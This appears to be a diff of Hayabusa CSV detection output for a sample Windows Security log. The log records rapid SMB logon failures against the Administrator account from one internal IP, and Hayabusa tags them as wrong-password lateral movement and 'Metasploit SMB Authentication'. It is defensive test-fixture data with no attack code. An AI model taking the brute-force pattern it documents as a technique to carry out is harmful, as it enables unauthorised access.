+2016-09-20 01:52:41.607 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lBg39AUtzZi6Q4iz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.607 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.650 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: huv5YEPo1n7UiFkq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.650 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.693 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9CLLwao1NDtBulxs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.693 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.732 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SB88EHHhDWhvJI87  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.732 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.782 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VtBvklueV4MZo3pJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.782 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.828 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: noha7Vw85VfURHik  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.828 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.861 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wl5eIYvoKpJGUcSl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.861 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.921 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bsS3JTLUWcFYvxAE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.921 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.957 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gjM6hj2bGxC124oZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.957 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.005 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: V3IQkVcY5iMTxCRN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.005 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.045 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: v44Kp3lpGKb6Xd4j  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.045 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.082 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7e1skdEmGlXbzUWk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.082 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.181 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: feaA6lAxWjapFbAW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.181 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IJZjTqY5innWcvSZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.220 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.273 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ymXIp0KTw0vIbB0N  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.273 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZpPJEcLv7BoZaQwT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.316 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Cz14Cv861RhFh0Pa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.357 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: H8BklDHdS0cdcbGu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.385 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0m5Mznl2khRMj31V  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.424 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.472 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Ha6TuN7C8V0roSAK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.472 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.517 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9oBW0yE5a9zSkpIH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.517 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.566 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: n54EaKOUQIX9geqx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.566 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.617 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: m6WCg3o4oatO42wW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.617 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.656 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KfCwo8ZUWiBqI8zC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.656 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.692 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8potisENMIsbNxcd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.692 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.732 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WgagMNj95dkg9uQd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.732 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: o1EVsGLFugwePvgR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.774 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6q00SeueJQAiBGpe  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.816 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.861 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QWzSR1cJ2XJNirSW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.861 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.904 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 39MY5ZvRJSHVkZZV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.904 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.944 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WyOdltctwdHNkH6i  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.944 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.989 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OUcWk0xJn9zVMZSF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.989 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.023 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: f2sauqNlJi3y0ZBk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.023 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bkih5QcLlcjw9gjg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.060 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.104 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3KlUJslcpS9jhLY4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.104 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: riuVWV1Ugr9c22hR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.149 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.189 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5OSj1I0sXkPf96OL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.189 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.229 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KsOJDxDiZSjoBj6F  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.229 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.269 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: uH0bQ9zEi1xcfHn3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.269 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.308 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3AfNT0p4JC1VEfDd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.308 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.353 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: S7T8R8U1WVHZQrYk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.353 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.388 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kamexpa7isWT8gLC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.388 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8CyHFKVcdTo0Upx3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.437 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.480 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: U30aMcZuBD08GWK1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.480 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.527 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4mihftSCNCYdlBny  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.527 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.553 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: K2wa0xwK6tnurGJQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
